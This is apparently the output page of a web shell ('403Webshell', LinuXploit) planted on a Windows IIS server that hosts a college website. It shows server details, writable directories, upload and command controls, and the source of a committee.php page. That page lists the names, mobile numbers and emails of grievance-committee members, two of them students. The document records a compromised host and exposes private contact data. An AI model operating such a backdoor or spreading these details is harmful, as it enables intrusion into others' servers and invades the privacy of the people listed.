403Webshell
Server IP : 50.63.8.194  /  Your IP : 216.73.216.202
Web Server : Microsoft-IIS/10.0
System : Windows NT P3NWVPWEB026 10.0 build 17763 (Windows Server 2016) AMD64
User : IWPD_7824(SpiPanel) ( 0)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  G:/PleskVhosts/polyprep.in/mmitshamli.ac.in/home/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : G:/PleskVhosts/polyprep.in/mmitshamli.ac.in/home/committee.php
<?php
$title = "Committee";

include("../admin/connection.php");

$q_mou = "select * from tbl_mou order by doc_id desc";
$res_mou = mysqli_query($dbCon, $q_mou);

?>
<!DOCTYPE html>
<html lang="en">


<head>

    <?php
include('../home_include/header_link.php');
?>


</head>

<body>

    <div class="page-wrapper" id="page-wrapper">

        <?php
    include('../home_include/header.php');
    ?>




<!-- page content start  -->



<!-- start inner banner -->
<section class="inner-banner">
    <h1 class="font-weight-bold text-center">Committee & Cells</h1>
</section>
<div class="container mt-5">
	<h3 class="font-weight-bold text-center">Grievance cell committee / Internal complaint committee</h3>
	<h1 class="font-weight-bold text-center">(IGC/ICC)</h1>
    <table class="table table-bordered mt-5 table-responsive-sm w-100" id="mytable">
 <tbody>
	 <tr >
  		<th>S.NO</th>
  		<th >NAME</th>
  		<th>DESIGNATION</th>
  		<th>MOBILE NO</th>
  		<th>EMAIL ID</th>
 	</tr>
 	<tr>
  		<td>1</td>
  		<td>Shri Lokesh Kumar</td>
  		<td>President/ Member</td>
  		<td>9997816977</td>
  		<td>lokeshrt12@gmail.com</td>
 	</tr>
 	<tr>
  		<td>2</td>
  		<td>Shri Kapil Kumar Singh</td>
  		<td>Member</td>
  		<td>9411954471</td>
  		<td>kapil.skumar@gmail.com</td>
 	</tr>
 	<tr>
  		<td>3</td>
  		<td>Km. Kajal Sangwan</td>
  		<td>President/ Member</td>
  		<td>6398896184</td>
  		<td>kajalsangwan24@gmail.com</td>
 	</tr>
 	<tr>
  		<td>4</td>
  		<td>Km. Sweta</td>
  		<td>Member</td>
  		<td>7351973478</td>
  		<td>sweta.chaudharybed@gmail.com</td>
 	</tr>
 	<tr>
		<td>5</td>
  		<td>Shri Jitendra Kumar</td>
  		<td>Member</td>
  		<td>9651739772</td>
  		<td>jitendrak.dav@gmail.com</td>
 	</tr>
 	<tr>
  		<td>6</td>
  		<td>Shri Yugeshwar Kumar Pragya</td>
  		<td>Student</td>
  		<td>9565270757</td>
  		<td>ramsingarramsingar216@gmail.com</td>
 	</tr>
 	<tr>
  		<td>7</td>
  		<td>Km. Saziya</td>
  		<td>Student</td>
  		<td>9520108939</td>
  		<td>sweta.chaudharybed@gmail.com</td>
 	</tr>
	</tbody>
</table>
<br/>
</div>

<!-- end inner banner -->




<script src="../../ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
<script type="text/javascript" src="../../cdn.datatables.net/1.10.16/js/jquery.dataTables.min.js"></script>
<script>
    $(document).ready(function () {
        $('#mytable').DataTable();

    });
</script>




<!-- page content end  -->







        <?php
    include('../home_include/footer.php');
    ?>


    </div>


    <?php
    include('../home_include/footer_link.php');
    ?>

</body>



</html>

Youez - 2016 - github.com/yon3zu
LinuXploit